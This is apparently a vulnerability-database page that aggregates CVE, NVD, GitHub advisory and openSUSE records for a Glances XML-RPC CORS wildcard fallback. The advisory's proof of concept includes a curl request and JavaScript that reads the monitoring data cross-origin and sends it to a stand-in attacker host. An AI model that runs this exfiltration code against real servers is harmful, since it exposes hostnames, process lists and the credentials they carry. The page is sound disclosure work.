Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-46608 (GCVE-0-2026-46608)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:05 – Updated: 2026-06-26 18:42
VLAI
EPSS
Title
Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim's knowledge. This vulnerability is fixed in 4.5.5.
Severity
7.4 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46608",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T17:50:40.059541Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-26T18:42:27.698Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-183",
"description": "CWE-183: Permissive List of Allowed Inputs",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-942",
"description": "CWE-942: Permissive Cross-domain Policy with Untrusted Domains",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:05:48.123Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-87qc-fj39-wccr",
"discovery": "UNKNOWN"
},
"title": "Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46608",
"datePublished": "2026-06-25T18:05:48.123Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-26T18:42:27.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46608",
"date": "2026-06-26",
"epss": "0.00401",
"percentile": "0.31899"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46608\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-26T17:50:40.059541Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-26T17:50:41.245Z\"}}], \"cna\": {\"title\": \"Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)\", \"source\": {\"advisory\": \"GHSA-87qc-fj39-wccr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-183\", \"description\": \"CWE-183: Permissive List of Allowed Inputs\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-942\", \"description\": \"CWE-942: Permissive Cross-domain Policy with Untrusted Domains\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:05:48.123Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46608\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T18:42:27.698Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:05:48.123Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46608
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-26 19:16
Severity
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim's knowledge. This vulnerability is fixed in 4.5.5.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46608",
"lastModified": "2026-06-26T19:16:40.757",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46608",
"options": [
{
"exploitation": "none"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T17:50:40.059541Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.663",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-183"
},
{
"lang": "en",
"value": "CWE-942"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-87QC-FJ39-WCCR
Vulnerability from github – Published: 2026-06-22 21:27 – Updated: 2026-06-22 21:27
VLAI
Summary
Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)
Details
Summary
The Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE 2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard — the same exposure that the original CVE described. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim's knowledge.
Details
Affected file: glances/server.py, class GlancesXMLRPCServer, line 113
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py#L113
# server.py (GlancesXMLRPCServer.__init__)
cors_origins = self.args.cors_origins # list from config / CLI
# Line 113 — the incomplete fix:
self.cors_origin = cors_origins[0] if len(cors_origins) == 1 else '*'
# ^^^
# Any allowlist with 2+ entries collapses to the wildcard
The cors_origin value is then echoed back as the Access-Control-Allow-Origin response header for every request (line ~147 in the same file):
self.send_header('Access-Control-Allow-Origin', self.cors_origin)
This means the CORS header is determined once at server startup and never compared against the actual Origin header sent by the browser. Even if an operator sets:
# glances.conf
[outputs]
cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com
the server responds with Access-Control-Allow-Origin: * to every request, including those from https://attacker.example.com.
Single-origin wildcard (the default, cors_origins = *) is also still in effect; the fix only helps if exactly one non-wildcard origin is configured.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
Test results:
| Origin sent | ACAO header returned | Expected |
|---|---|---|
http://evil.example.com |
* |
No header |
https://dashboard.corp |
* |
Reflected |
https://grafana.corp |
* |
Reflected |
PoC
Special configuration required
The multi-origin collapse is only triggered when cors_origins contains two or more entries. Create the following glances.conf:
# /tmp/glances_multiorigin.conf
[global]
check_update = false
[outputs]
cors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com
Step 1 — Start the XML-RPC server using the config above
glances -s -p 61209 -C /tmp/glances_multiorigin.conf
Step 2 — Send a CORS simple request from a foreign origin
curl -s -D - -X POST "http://TARGET_HOST:61209/RPC2" \
-H "Content-Type: text/plain" \
-H "Origin: http://evil.example.com" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Expected (secure) response:
HTTP/1.0 400 Bad Request
or no Access-Control-Allow-Origin header.
Actual response:
HTTP/1.0 200 OK
Access-Control-Allow-Origin: *
...
<?xml version='1.0'?>
<methodResponse>
<params><param><value><array><data>
<value><string>cpu</string></value>
<value><string>mem</string></value>
...
</data></array></value></param></params>
</methodResponse>
Step 3 — Demonstrate the code-level collapse to wildcard
import sys
sys.path.insert(0, '/path/to/glances') # adjust to local clone
from glances.config import Config
c = Config('/tmp/glances_multiorigin.conf')
cors_list = c.get_list_value('outputs', 'cors_origins', default=['*'])
# Reproduces server.py line 113:
result = cors_list[0] if len(cors_list) == 1 else '*'
print('cors_origins config :', cors_list)
print('cors_origin applied :', result)
print('Is wildcard? :', result == '*')
# cors_origins config : ['https://dashboard.corp.example.com', 'https://grafana.corp.example.com']
# cors_origin applied : *
# Is wildcard? : True
Browser-based exploitation
Once the wildcard is confirmed, the original CVE-2026-33533 attack vector still applies in full. A malicious page served to a victim whose browser can reach the Glances server can exfiltrate data as follows:
// Runs in a page on http://evil.example.com
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
fetch('http://GLANCES_HOST:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
})
.then(r => r.text())
.then(data => {
// 'data' contains hostname, OS, full process list, network interfaces, etc.
fetch('https://attacker.example.com/collect?d=' + btoa(data));
});
This works as a CORS "simple request" (POST + text/plain) — no CORS preflight is triggered and the * wildcard allows the browser to read the response.
Impact
Vulnerability type: CORS Misconfiguration / Bypass of CVE-2026-33533 mitigation (CWE-942)
Who is impacted: Any operator who:
1. Runs Glances in XML-RPC server mode (glances -s), and
2. Has configured two or more cors_origins entries in glances.conf believing
they are restricting browser access.
Operators using the default single-wildcard configuration (cors_origins = *, which is the upstream default) remain affected by the original CVE-2026-33533 exposure (unrestricted cross-origin read). The incomplete fix addresses only the narrow case of a single non-wildcard origin.
Data exposed through the XML-RPC API includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, listening ports, and Docker/Kubernetes container metadata.
Impact: - Confidentiality: High — complete system monitoring data readable by any browser page. - Integrity: None — read-only API. - Availability: None — no denial-of-service component.
Suggested Fix
Implement per-request origin reflection against the configured allowlist, as recommended by the W3C CORS specification and as done by modern CORS middleware (e.g. Starlette's CORSMiddleware):
# server.py — replace the single static self.cors_origin field with:
def _get_acao_header(self, request_origin: str) -> str | None:
"""Return the correct Access-Control-Allow-Origin value or None."""
if not self.cors_origins or '*' in self.cors_origins:
return '*'
if request_origin in self.cors_origins:
return request_origin
return None # do not send the header for unlisted origins
# In do_POST / send_response:
origin = self.headers.get('Origin', '')
acao = self._get_acao_header(origin)
if acao:
self.send_header('Access-Control-Allow-Origin', acao)
self.send_header('Vary', 'Origin')
Additionally, consider retiring the legacy XML-RPC server in favour of the REST API (glances -w), which uses Starlette's CORSMiddleware correctly, and document the deprecation path.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
Severity
7.4 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46608"
],
"database_specific": {
"cwe_ids": [
"CWE-183",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:27:24Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe Glances XML-RPC server (`glances -s`) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE 2026-33533. However, the implementation silently falls back to `Access-Control-Allow-Origin: *` whenever `cors_origins` contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard \u2014 the same exposure that the original CVE described. A malicious web page served from any origin can issue a CORS simple request to `/RPC2` and read the full system monitoring dataset without the victim\u0027s knowledge.\n\n---\n\n### Details\n\n**Affected file:** `glances/server.py`, class `GlancesXMLRPCServer`, line 113\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py#L113\n\n```python\n# server.py (GlancesXMLRPCServer.__init__)\ncors_origins = self.args.cors_origins # list from config / CLI\n\n# Line 113 \u2014 the incomplete fix:\nself.cors_origin = cors_origins[0] if len(cors_origins) == 1 else \u0027*\u0027\n# ^^^\n# Any allowlist with 2+ entries collapses to the wildcard\n```\n\nThe `cors_origin` value is then echoed back as the `Access-Control-Allow-Origin` response header for every request (line ~147 in the same file):\n\n```python\nself.send_header(\u0027Access-Control-Allow-Origin\u0027, self.cors_origin)\n```\n\nThis means the CORS header is determined once at server startup and never compared against the actual `Origin` header sent by the browser. Even if an operator sets:\n\n```ini\n# glances.conf\n[outputs]\ncors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com\n```\n\nthe server responds with `Access-Control-Allow-Origin: *` to every request, including those from `https://attacker.example.com`.\n\n**Single-origin wildcard** (the default, `cors_origins = *`) is also still in effect; the fix only helps if exactly one non-wildcard origin is configured.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nTest results:\n\n| Origin sent | ACAO header returned | Expected |\n|--------------------------|----------------------|--------------|\n| `http://evil.example.com`| `*` | No header |\n| `https://dashboard.corp` | `*` | Reflected |\n| `https://grafana.corp` | `*` | Reflected |\n\n---\n\n### PoC\n\n**Special configuration required**\n\nThe multi-origin collapse is only triggered when `cors_origins` contains two or more entries. Create the following `glances.conf`:\n\n```ini\n# /tmp/glances_multiorigin.conf\n[global]\ncheck_update = false\n\n[outputs]\ncors_origins = https://dashboard.corp.example.com,https://grafana.corp.example.com\n```\n\n**Step 1 \u2014 Start the XML-RPC server using the config above**\n\n```bash\nglances -s -p 61209 -C /tmp/glances_multiorigin.conf\n```\n\n**Step 2 \u2014 Send a CORS simple request from a foreign origin**\n\n```bash\ncurl -s -D - -X POST \"http://TARGET_HOST:61209/RPC2\" \\\n -H \"Content-Type: text/plain\" \\\n -H \"Origin: http://evil.example.com\" \\\n -d \u0027\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAllPlugins\u003c/methodName\u003e\u003c/methodCall\u003e\u0027\n```\n\n**Expected (secure) response:**\n\n```\nHTTP/1.0 400 Bad Request\n```\n\nor no `Access-Control-Allow-Origin` header.\n\n**Actual response:**\n\n```\nHTTP/1.0 200 OK\nAccess-Control-Allow-Origin: *\n...\n\u003c?xml version=\u00271.0\u0027?\u003e\n\u003cmethodResponse\u003e\n \u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003carray\u003e\u003cdata\u003e\n \u003cvalue\u003e\u003cstring\u003ecpu\u003c/string\u003e\u003c/value\u003e\n \u003cvalue\u003e\u003cstring\u003emem\u003c/string\u003e\u003c/value\u003e\n ...\n \u003c/data\u003e\u003c/array\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\n\u003c/methodResponse\u003e\n```\n\n**Step 3 \u2014 Demonstrate the code-level collapse to wildcard**\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nfrom glances.config import Config\n\nc = Config(\u0027/tmp/glances_multiorigin.conf\u0027)\ncors_list = c.get_list_value(\u0027outputs\u0027, \u0027cors_origins\u0027, default=[\u0027*\u0027])\n# Reproduces server.py line 113:\nresult = cors_list[0] if len(cors_list) == 1 else \u0027*\u0027\n\nprint(\u0027cors_origins config :\u0027, cors_list)\nprint(\u0027cors_origin applied :\u0027, result)\nprint(\u0027Is wildcard? :\u0027, result == \u0027*\u0027)\n# cors_origins config : [\u0027https://dashboard.corp.example.com\u0027, \u0027https://grafana.corp.example.com\u0027]\n# cors_origin applied : *\n# Is wildcard? : True\n```\n\n**Browser-based exploitation**\n\nOnce the wildcard is confirmed, the original CVE-2026-33533 attack vector still applies in full. A malicious page served to a victim whose browser can reach the Glances server can exfiltrate data as follows:\n\n```javascript\n// Runs in a page on http://evil.example.com\nconst payload = `\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAll\u003c/methodName\u003e\u003c/methodCall\u003e`;\n\nfetch(\u0027http://GLANCES_HOST:61209/RPC2\u0027, {\n method: \u0027POST\u0027,\n headers: { \u0027Content-Type\u0027: \u0027text/plain\u0027 },\n body: payload,\n})\n.then(r =\u003e r.text())\n.then(data =\u003e {\n // \u0027data\u0027 contains hostname, OS, full process list, network interfaces, etc.\n fetch(\u0027https://attacker.example.com/collect?d=\u0027 + btoa(data));\n});\n```\n\nThis works as a CORS \"simple request\" (POST + `text/plain`) \u2014 no CORS preflight is triggered and the `*` wildcard allows the browser to read the response.\n\n---\n\n### Impact\n\n**Vulnerability type:** CORS Misconfiguration / Bypass of CVE-2026-33533 mitigation (CWE-942)\n\n**Who is impacted:** Any operator who:\n1. Runs Glances in XML-RPC server mode (`glances -s`), *and*\n2. Has configured two or more `cors_origins` entries in `glances.conf` believing\n they are restricting browser access.\n\nOperators using the default single-wildcard configuration (`cors_origins = *`, which is the upstream default) remain affected by the original CVE-2026-33533 exposure (unrestricted cross-origin read). The incomplete fix addresses only the narrow case of a single non-wildcard origin.\n\n**Data exposed through the XML-RPC API** includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, passwords, and tokens), CPU/memory/disk/network statistics, listening ports, and Docker/Kubernetes container metadata.\n\n**Impact:**\n- **Confidentiality:** High \u2014 complete system monitoring data readable by any browser page.\n- **Integrity:** None \u2014 read-only API.\n- **Availability:** None \u2014 no denial-of-service component.\n\n---\n\n### Suggested Fix\n\nImplement per-request origin reflection against the configured allowlist, as recommended by the W3C CORS specification and as done by modern CORS middleware (e.g. Starlette\u0027s `CORSMiddleware`):\n\n```python\n# server.py \u2014 replace the single static self.cors_origin field with:\n\ndef _get_acao_header(self, request_origin: str) -\u003e str | None:\n \"\"\"Return the correct Access-Control-Allow-Origin value or None.\"\"\"\n if not self.cors_origins or \u0027*\u0027 in self.cors_origins:\n return \u0027*\u0027\n if request_origin in self.cors_origins:\n return request_origin\n return None # do not send the header for unlisted origins\n\n# In do_POST / send_response:\norigin = self.headers.get(\u0027Origin\u0027, \u0027\u0027)\nacao = self._get_acao_header(origin)\nif acao:\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, acao)\n self.send_header(\u0027Vary\u0027, \u0027Origin\u0027)\n```\n\nAdditionally, consider retiring the legacy XML-RPC server in favour of the REST API (`glances -w`), which uses Starlette\u0027s `CORSMiddleware` correctly, and document the deprecation path.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-87qc-fj39-wccr",
"modified": "2026-06-22T21:27:24Z",
"published": "2026-06-22T21:27:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-87qc-fj39-wccr"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances: XML-RPC Multi-Origin CORS Configuration Silently Falls Back to Wildcard (Incomplete Fix for CVE-2026-33533)"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00Summary
glances-common-4.5.5-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.5-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-11122
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
